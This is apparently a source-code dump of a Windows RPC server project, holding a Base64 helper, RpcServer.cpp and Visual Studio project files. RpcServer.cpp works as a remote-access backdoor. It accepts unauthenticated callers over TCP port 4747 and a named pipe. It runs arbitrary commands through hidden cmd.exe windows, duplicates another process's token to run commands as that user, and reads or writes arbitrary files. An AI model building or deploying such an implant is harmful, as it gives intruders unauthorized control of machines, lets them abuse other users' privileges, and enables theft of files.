Software. 18 | * 19 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 20 | * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 21 | * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 22 | * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 23 | * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 24 | * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 25 | * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 26 | */ 27 | 28 | #include 29 | 30 | namespace macaron { 31 | 32 | class Base64 { 33 | public: 34 | 35 | static std::string Encode(char* data, int length) { 36 | static constexpr char sEncodingTable[] = { 37 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 38 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 39 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 40 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 41 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 42 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 43 | 'w', 'x', 'y', 'z', '0', '1', '2', '3', 44 | '4', '5', '6', '7', '8', '9', '+', '/' 45 | }; 46 | 47 | size_t in_len = length;//data.size(); 48 | size_t out_len = 4 * ((in_len + 2) / 3); 49 | std::string ret(out_len, '\0'); 50 | size_t i; 51 | char* p = const_cast(ret.c_str()); 52 | 53 | for (i = 0; i < in_len - 2; i += 3) { 54 | *p++ = sEncodingTable[(data[i] >> 2) & 0x3F]; 55 | *p++ = sEncodingTable[((data[i] & 0x3) << 4) | ((int)(data[i + 1] & 0xF0) >> 4)]; 56 | *p++ = sEncodingTable[((data[i + 1] & 0xF) << 2) | ((int)(data[i + 2] & 0xC0) >> 6)]; 57 | *p++ = sEncodingTable[data[i + 2] & 0x3F]; 58 | } 59 | if (i < in_len) { 60 | *p++ = sEncodingTable[(data[i] >> 2) & 0x3F]; 61 | if (i == (in_len - 1)) { 62 | *p++ = sEncodingTable[((data[i] & 0x3) << 4)]; 63 | *p++ = '='; 64 | } 65 | else { 66 | *p++ = sEncodingTable[((data[i] & 0x3) << 4) | ((int)(data[i + 1] & 0xF0) >> 4)]; 67 | *p++ = sEncodingTable[((data[i + 1] & 0xF) << 2)]; 68 | } 69 | *p++ = '='; 70 | } 71 | 72 | return 
ret; 73 | } 74 | 75 | static int Decode(const std::string& input, char** out) { 76 | static constexpr unsigned char kDecodingTable[] = { 77 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 78 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 79 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 80 | 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 81 | 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 82 | 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 83 | 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 84 | 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 85 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 86 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 87 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 88 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 89 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 90 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 91 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 92 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 93 | }; 94 | 95 | size_t in_len = input.size(); 96 | if (in_len % 4 != 0) return -1; 97 | 98 | size_t out_len = in_len / 4 * 3; 99 | if (input[in_len - 1] == '=') out_len--; 100 | if (input[in_len - 2] == '=') out_len--; 101 | 102 | //out.resize(out_len); 103 | *out = new char[out_len]; 104 | 105 | for (size_t i = 0, j = 0; i < in_len;) { 106 | uint32_t a = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 107 | uint32_t b = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 108 | uint32_t c = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 109 | uint32_t d = input[i] == '=' ? 
0 & i++ : kDecodingTable[static_cast(input[i++])]; 110 | 111 | uint32_t triple = (a << 3 * 6) + (b << 2 * 6) + (c << 1 * 6) + (d << 0 * 6); 112 | 113 | if (j < out_len) (*out)[j++] = (triple >> 2 * 8) & 0xFF; 114 | if (j < out_len) (*out)[j++] = (triple >> 1 * 8) & 0xFF; 115 | if (j < out_len) (*out)[j++] = (triple >> 0 * 8) & 0xFF; 116 | } 117 | 118 | return out_len; 119 | } 120 | 121 | }; 122 | 123 | } 124 | 125 | #endif /* _MACARON_BASE64_H_ */ -------------------------------------------------------------------------------- /RpcServer/RpcServer.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../RpcServerInterface/RpcServerInterface.h" 5 | #include "../RpcServerInterface2/RpcServerInterface2.h" 6 | #include 7 | #include 8 | #include "Base64.h" 9 | 10 | void Execute(LPSTR* Command, LPSTR* Output) // Runs *Command through cmd.exe and returns the captured STDOUT/STDERR text in *Output 11 | { 12 | // Prepend "cmd.exe /c " to the command; the caller-supplied string is passed to the shell without validation 13 | std::string command_with_prefix = std::string("cmd.exe /c ") + std::string(*Command); 14 | 15 | // Create an inheritable pipe to capture the child's STDOUT and STDERR 16 | HANDLE hPipeRead, hPipeWrite; 17 | SECURITY_ATTRIBUTES saAttr = { sizeof(SECURITY_ATTRIBUTES) }; 18 | saAttr.bInheritHandle = TRUE; 19 | saAttr.lpSecurityDescriptor = NULL; 20 | 21 | if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0)) 22 | { 23 | *Output = strdup("Execute Failed"); 24 | return; 25 | } 26 | 27 | // Prepare structs for CreateProcess: both output handles point at the pipe and the window is hidden (SW_HIDE) 28 | STARTUPINFOA startupInfo = { sizeof(STARTUPINFOA) }; 29 | startupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 30 | startupInfo.hStdOutput = hPipeWrite; 31 | startupInfo.hStdError = hPipeWrite; 32 | startupInfo.wShowWindow = SW_HIDE; 33 | startupInfo.dwFlags |= STARTF_USESHOWWINDOW; 34 | 35 | PROCESS_INFORMATION processInformation = { 0 }; 36 | 37 | // Execute the command with handle inheritance enabled so the child can write to the pipe 38 | BOOL fSuccess = CreateProcessA(NULL, (LPSTR)command_with_prefix.c_str(), NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &startupInfo, &processInformation); 
39 | if (!fSuccess) 40 | { 41 | CloseHandle(hPipeWrite); 42 | CloseHandle(hPipeRead); 43 | *Output = strdup("Execute Failed"); 44 | return; 45 | } 46 | 47 | // Read the output until the process terminates 48 | std::string output; 49 | bool bProcessEnded = false; 50 | while (!bProcessEnded) 51 | { 52 | bProcessEnded = WaitForSingleObject(processInformation.hProcess, 100) == WAIT_OBJECT_0; 53 | 54 | while(true) 55 | { 56 | char buf[1024]; 57 | DWORD dwRead = 0; 58 | DWORD dwAvail = 0; 59 | 60 | if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL)) 61 | break; 62 | 63 | if (!dwAvail) 64 | break; 65 | 66 | if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead) 67 | break; 68 | 69 | buf[dwRead] = 0; 70 | output += std::string(buf); 71 | } 72 | } 73 | 74 | // Clean up 75 | CloseHandle(hPipeWrite); 76 | CloseHandle(hPipeRead); 77 | CloseHandle(processInformation.hProcess); 78 | CloseHandle(processInformation.hThread); 79 | 80 | *Output = strdup(output.c_str()); 81 | } 82 | 83 | void ExecuteWithToken(LPSTR* Command, int ProcessId, LPSTR* Output) 84 | { 85 | // We need to convert the command to unicode for CreateProcessWithTokenW 86 | std::string command = std::string("/c ") + std::string(*Command); 87 | std::wstring command_w; 88 | command_w.assign(command.begin(), command.end()); 89 | 90 | // Create pipes to read STDOUT 91 | HANDLE hPipeRead, hPipeWrite; 92 | SECURITY_ATTRIBUTES saAttr = { sizeof(SECURITY_ATTRIBUTES) }; 93 | saAttr.bInheritHandle = TRUE; // Pipe handles are inherited by child process. 
94 | saAttr.lpSecurityDescriptor = NULL; 95 | 96 | if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0)) 97 | { 98 | wprintf(L"Executtion failed (Error: %d).\n", GetLastError()); 99 | *Output = strdup("Execution failed"); 100 | return; 101 | } 102 | 103 | HANDLE tokenHandle = NULL; 104 | HANDLE duplicateTokenHandle = NULL; 105 | // Call OpenProcess to get a process handle 106 | HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, ProcessId); 107 | if (GetLastError() == NULL) 108 | printf("[+] OpenProcess() success!\n"); 109 | else 110 | { 111 | printf("[-] OpenProcess() Return Code: %i\n", processHandle); 112 | printf("[-] OpenProcess() Error: %i\n", GetLastError()); 113 | } 114 | 115 | // Call OpenProcessToken() to get a handle for the process token 116 | BOOL getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE, &tokenHandle); 117 | if (GetLastError() == NULL) 118 | printf("[+] OpenProcessToken() success!\n"); 119 | else 120 | { 121 | printf("[-] OpenProcessToken() Return Code: %i\n", getToken); 122 | printf("[-] OpenProcessToken() Error: %i\n", GetLastError()); 123 | } 124 | 125 | // Duplicate the process token 126 | BOOL duplicateToken = DuplicateTokenEx(tokenHandle, TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle); 127 | if (GetLastError() == NULL) 128 | printf("[+] DuplicateTokenEx() success!\n"); 129 | else 130 | { 131 | printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken); 132 | printf("[-] DupicateTokenEx() Error: %i\n", GetLastError()); 133 | } 134 | 135 | // Prepare structs for CreateProcessWithTokenW 136 | STARTUPINFOW startupInfo = { sizeof(STARTUPINFOW) }; 137 | startupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 138 | startupInfo.hStdOutput = hPipeWrite; 139 | startupInfo.hStdError = hPipeWrite; 140 | startupInfo.wShowWindow = SW_HIDE; 141 | startupInfo.dwFlags |= 
STARTF_USESHOWWINDOW; 142 | 143 | PROCESS_INFORMATION processInformation = { 0 }; 144 | // Call CreateProcessWithTokenW 145 | BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, 0, L"cmd.exe", (LPWSTR)command_w.c_str(), 0, NULL, NULL, &startupInfo, &processInformation); 146 | if (GetLastError() == NULL) 147 | printf("[+] Process spawned!\n"); 148 | else 149 | { 150 | printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess); 151 | printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError()); 152 | } 153 | 154 | if (!createProcess) { 155 | *Output = strdup("ExecuteWithToken Failed"); 156 | return; 157 | } 158 | 159 | // Read the output until the process terminates 160 | std::string output; 161 | bool bProcessEnded = false; 162 | while(!bProcessEnded) 163 | { 164 | bProcessEnded = WaitForSingleObject(processInformation.hProcess, 100) == WAIT_OBJECT_0; 165 | 166 | while (true) 167 | { 168 | char buf[1024]; 169 | DWORD dwRead = 0; 170 | DWORD dwAvail = 0; 171 | 172 | if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL)) 173 | break; 174 | 175 | if (!dwAvail) 176 | break; 177 | 178 | if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead) 179 | break; 180 | 181 | buf[dwRead] = 0; 182 | output += std::string(buf); 183 | } 184 | } 185 | 186 | // Clean up 187 | CloseHandle(processHandle); 188 | CloseHandle(tokenHandle); 189 | CloseHandle(duplicateTokenHandle); 190 | CloseHandle(hPipeWrite); 191 | CloseHandle(hPipeRead); 192 | CloseHandle(processInformation.hProcess); 193 | CloseHandle(processInformation.hThread); 194 | 195 | *Output = strdup(output.c_str()); 196 | } 197 | 198 | static char* ReadFile(LPSTR filename, int* length) 199 | { 200 | size_t size; 201 | 202 | // Open the file 203 | std::ifstream ifs(filename, std::ios::in | std::ios::binary | std::ios::ate); 204 | if (!ifs.is_open()) 205 | { 206 | *length = -1; 207 | return NULL; 208 | } 209 | 210 | // Get the file size 211 | ifs.seekg(0, 
std::ios::end); 212 | size = ifs.tellg(); 213 | ifs.seekg(0, std::ios::beg); 214 | char* pChars = new char[size]; 215 | 216 | // Read all bytes 217 | ifs.read(pChars, size); 218 | 219 | // Close the file and record the byte count in *length 220 | ifs.close(); 221 | *length = size; 222 | 223 | // Base64 encode the file and return it. NOTE(review): the assignment from pChars treats the buffer as NUL-terminated although no terminator is written, and pChars is never freed 224 | std::string encoded = pChars; 225 | macaron::Base64 encoder; 226 | encoded = encoder.Encode(pChars, *length); 227 | 228 | return strdup(encoded.c_str()); 229 | } 230 | 231 | void Download(LPSTR* Path, LPSTR* Data) // Sets *Data to the Base64-encoded contents of the file at *Path (NULL if the file cannot be opened) 232 | { 233 | int length = -1; 234 | *Data = ReadFile(*Path, &length); 235 | } 236 | 237 | void SaveFile(LPSTR path, char* buffer) // Decodes the Base64 text in buffer and writes the bytes to path 238 | { 239 | // Base64 decode the data. NOTE(review): Decode returns -1 without allocating when the input length is not a multiple of 4, and that result is not checked before the write below 240 | macaron::Base64 encoder; 241 | char* decoded; 242 | int length; 243 | length = encoder.Decode(buffer, &decoded); 244 | 245 | // Save the data to the caller-supplied path (the path is not validated and the decoded buffer is not freed) 246 | std::ofstream ofs(path, std::ios::out | std::ios::binary); 247 | ofs.write(decoded, length); 248 | ofs.close(); 249 | } 250 | 251 | void Upload(LPSTR* Path, LPSTR* Data) // Writes the Base64-decoded *Data to the file at *Path via SaveFile 252 | { 253 | SaveFile(*Path, *Data); 254 | } 255 | 256 | void Shutdown() // Stops the RPC listener, unregisters the interfaces, then exits the calling thread; exits the process with the status code if either call fails 257 | { 258 | RPC_STATUS status; 259 | 260 | status = RpcMgmtStopServerListening(NULL); 261 | 262 | if (status) 263 | { 264 | exit(status); 265 | } 266 | 267 | status = RpcServerUnregisterIf(NULL, NULL, FALSE); 268 | 269 | if (status) 270 | { 271 | exit(status); 272 | } 273 | 274 | ExitThread(0); 275 | } 276 | void Shutdown2() // Same operation as Shutdown; presumably the entry exposed by the second interface (TODO confirm against the IDL) 277 | { 278 | Shutdown(); 279 | } 280 | 281 | RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE, void*) 282 | { 283 | return RPC_S_OK; // Always allow anyone: no caller authentication or authorization is performed 284 | } 285 | 286 | int main() 287 | { 288 | RPC_STATUS status; 289 | 290 | // Register TCP/IP endpoint 291 | status = RpcServerUseProtseqEp( 292 | (RPC_CSTR)"ncacn_ip_tcp", 293 | RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 294 | (RPC_CSTR)"4747", // TCP/IP port to use (hard-coded). 
295 | NULL); 296 | 297 | if (status) 298 | exit(status); 299 | 300 | // Registers the first interface 301 | status = RpcServerRegisterIf2( 302 | RpcServerInterface_v1_0_s_ifspec, 303 | NULL, 304 | NULL, 305 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, 306 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, 307 | (unsigned)-1, 308 | SecurityCallback); 309 | 310 | if (status) 311 | exit(status); 312 | 313 | // Register named pipes endpoint 314 | status = RpcServerUseProtseqEp( 315 | (RPC_CSTR)"ncacn_np", 316 | RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 317 | (RPC_CSTR)"\\pipe\\atctl", // Hard-coded pipe name 318 | NULL); 319 | 320 | if (status) 321 | exit(status); 322 | 323 | // Registers the second interface 324 | status = RpcServerRegisterIf2( 325 | RpcServerInterface2_v1_0_s_ifspec, 326 | NULL, 327 | NULL, 328 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, 329 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, 330 | (unsigned)-1, 331 | SecurityCallback); 332 | 333 | if (status) 334 | exit(status); 335 | 336 | // Start to listen for remote procedure calls for all registered interfaces 337 | status = RpcServerListen( 338 | 2, // Recommended minimum number of threads 339 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, // Recommended maximum number of threads 340 | FALSE); 341 | 342 | if (status) 343 | exit(status); 344 | } 345 | 346 | void* __RPC_USER midl_user_allocate(size_t size) 347 | { 348 | return malloc(size); 349 | } 350 | 351 | void __RPC_USER midl_user_free(void* p) 352 | { 353 | free(p); 354 | } 355 | -------------------------------------------------------------------------------- /RpcServer/RpcServer.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {758DB128-9123-4E1B-A6C3-47323714123A} 23 | Win32Proj 24 | RpcServer 25 | 10.0 26 | 27 | 28 | 29 | Application 30 | MultiByte 31 | v143 32 | 33 | 34 | Application 35 | MultiByte 36 | v143 37 | 38 
| 39 | Application 40 | MultiByte 41 | v143 42 | 43 | 44 | Application 45 | MultiByte 46 | v143 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | <_ProjectFileVersion>10.0.40219.1 66 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 67 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 68 | true 69 | true 70 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 71 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 72 | false 73 | false 74 | 75 | 76 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 77 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 78 | 79 | 80 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 81 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 82 | 83 | 84 | 85 | Disabled 86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 87 | true 88 | EnableFastChecks 89 | MultiThreadedDebug 90 | true 91 | true 92 | true 93 | 94 | 95 | Level4 96 | EditAndContinue 97 | 98 | 99 | rpcrt4.lib;%(AdditionalDependencies) 100 | $(OutDir)RpcServer.exe 101 | true 102 | $(OutDir)RpcServer.pdb 103 | Console 104 | MachineX86 105 | 106 | 107 | 108 | 109 | Disabled 110 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 111 | EnableFastChecks 112 | MultiThreadedDebug 113 | true 114 | true 115 | true 116 | 117 | 118 | Level4 119 | ProgramDatabase 120 | 121 | 122 | rpcrt4.lib;%(AdditionalDependencies) 123 | $(OutDir)RpcServer.exe 124 | true 125 | $(OutDir)RpcServer.pdb 126 | Console 127 | 128 | 129 | 130 | 131 | MaxSpeed 132 | OnlyExplicitInline 133 | true 134 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 135 | true 136 | MultiThreaded 137 | true 138 | true 139 | true 140 | true 141 | 142 | 143 | Level4 144 | ProgramDatabase 145 | 146 | 147 | rpcrt4.lib;%(AdditionalDependencies) 148 | $(OutDir)RpcServer.exe 149 | true 150 | Console 151 | true 152 | true 153 | MachineX86 154 | 155 | 156 | 157 | 158 | MaxSpeed 159 | OnlyExplicitInline 160 | true 161 | 
WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 162 | true 163 | MultiThreaded 164 | true 165 | true 166 | true 167 | true 168 | 169 | 170 | Level4 171 | ProgramDatabase 172 | 173 | 174 | rpcrt4.lib;%(AdditionalDependencies) 175 | $(OutDir)RpcServer.exe 176 | true 177 | Console 178 | true 179 | true 180 | 181 | 182 | 183 | 184 | 185 | 186 | Level3 187 | Level3 188 | Level3 189 | Level3 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | {8558952e-c76b-4976-949f-76a977da7f8a} 200 | 201 | 202 | {6536ebec-014e-4d6b-97be-223137694ca8} 203 | 204 | 205 | 206 | 207 | 208 | -------------------------------------------------------------------------------- /RpcServer/RpcServer.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /RpcServerDll/Base64.h: -------------------------------------------------------------------------------- 1 | #ifndef _MACARON_BASE64_H_ 2 | #define _MACARON_BASE64_H_ 3 | 4 | /** 5 | * The MIT License (MIT) 6 | * Copyright (c) 2016 tomykaira 7 | * 8 | * Permission is hereby granted, free of charge, to any person obtaining 9 | * a copy of this software and associated documentation files (the 10 | * "Software"), to deal in the Software without restriction, including 11 | * without limitation the rights to use, copy, modify, merge, publish, 12 | * distribute, sublicense, and/or sell copies of the Software, and to 13 | * permit persons to whom the Software is furnished to do so, subject to 14 | * the following conditions: 15 | * 16 | * The above copyright notice and this permission notice shall be 17 | * included in all copies or substantial portions of the Software. 18 | * 19 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 20 | * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 21 | * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 22 | * NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 23 | * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 24 | * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 25 | * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 26 | */ 27 | 28 | #include 29 | 30 | namespace macaron { 31 | 32 | class Base64 { 33 | public: 34 | 35 | static std::string Encode(char* data, int length) { 36 | static constexpr char sEncodingTable[] = { 37 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 38 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 39 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 40 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 41 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 42 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 43 | 'w', 'x', 'y', 'z', '0', '1', '2', '3', 44 | '4', '5', '6', '7', '8', '9', '+', '/' 45 | }; 46 | 47 | size_t in_len = length;//data.size(); 48 | size_t out_len = 4 * ((in_len + 2) / 3); 49 | std::string ret(out_len, '\0'); 50 | size_t i; 51 | char* p = const_cast(ret.c_str()); 52 | 53 | for (i = 0; i < in_len - 2; i += 3) { 54 | *p++ = sEncodingTable[(data[i] >> 2) & 0x3F]; 55 | *p++ = sEncodingTable[((data[i] & 0x3) << 4) | ((int)(data[i + 1] & 0xF0) >> 4)]; 56 | *p++ = sEncodingTable[((data[i + 1] & 0xF) << 2) | ((int)(data[i + 2] & 0xC0) >> 6)]; 57 | *p++ = sEncodingTable[data[i + 2] & 0x3F]; 58 | } 59 | if (i < in_len) { 60 | *p++ = sEncodingTable[(data[i] >> 2) & 0x3F]; 61 | if (i == (in_len - 1)) { 62 | *p++ = sEncodingTable[((data[i] & 0x3) << 4)]; 63 | *p++ = '='; 64 | } 65 | else { 66 | *p++ = sEncodingTable[((data[i] & 0x3) << 4) | ((int)(data[i + 1] & 0xF0) >> 4)]; 67 | *p++ = sEncodingTable[((data[i + 1] & 0xF) << 2)]; 68 | } 69 | *p++ = '='; 70 | } 71 | 72 | return ret; 73 | } 74 | 75 | static int Decode(const std::string& input, char** out) { 76 | static constexpr unsigned char kDecodingTable[] = { 77 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 78 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 
64, 64, 64, 64, 64, 64, 64, 79 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 80 | 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 81 | 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 82 | 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 83 | 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 84 | 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 85 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 86 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 87 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 88 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 89 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 90 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 91 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 92 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 93 | }; 94 | 95 | size_t in_len = input.size(); 96 | if (in_len % 4 != 0) return -1; 97 | 98 | size_t out_len = in_len / 4 * 3; 99 | if (input[in_len - 1] == '=') out_len--; 100 | if (input[in_len - 2] == '=') out_len--; 101 | 102 | //out.resize(out_len); 103 | *out = new char[out_len]; 104 | 105 | for (size_t i = 0, j = 0; i < in_len;) { 106 | uint32_t a = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 107 | uint32_t b = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 108 | uint32_t c = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 109 | uint32_t d = input[i] == '=' ? 
0 & i++ : kDecodingTable[static_cast(input[i++])]; 110 | 111 | uint32_t triple = (a << 3 * 6) + (b << 2 * 6) + (c << 1 * 6) + (d << 0 * 6); 112 | 113 | if (j < out_len) (*out)[j++] = (triple >> 2 * 8) & 0xFF; 114 | if (j < out_len) (*out)[j++] = (triple >> 1 * 8) & 0xFF; 115 | if (j < out_len) (*out)[j++] = (triple >> 0 * 8) & 0xFF; 116 | } 117 | 118 | return out_len; 119 | } 120 | 121 | }; 122 | 123 | } 124 | 125 | #endif /* _MACARON_BASE64_H_ */ -------------------------------------------------------------------------------- /RpcServerDll/RpcServerDll.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {3c21f82b-b958-457a-82bb-b8a795316d3d} 25 | RpcServerDll 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 75 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 76 | 77 | 78 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 79 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 80 | 81 | 82 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 83 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 84 | 85 | 86 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 87 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 88 | 89 | 90 | 91 | Level3 92 | true 93 | WIN32;_DEBUG;RpcServerDll_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 94 | true 95 | NotUsing 96 | pch.h 97 | 4996 98 | 99 | 100 | Windows 101 | true 102 | false 103 | 
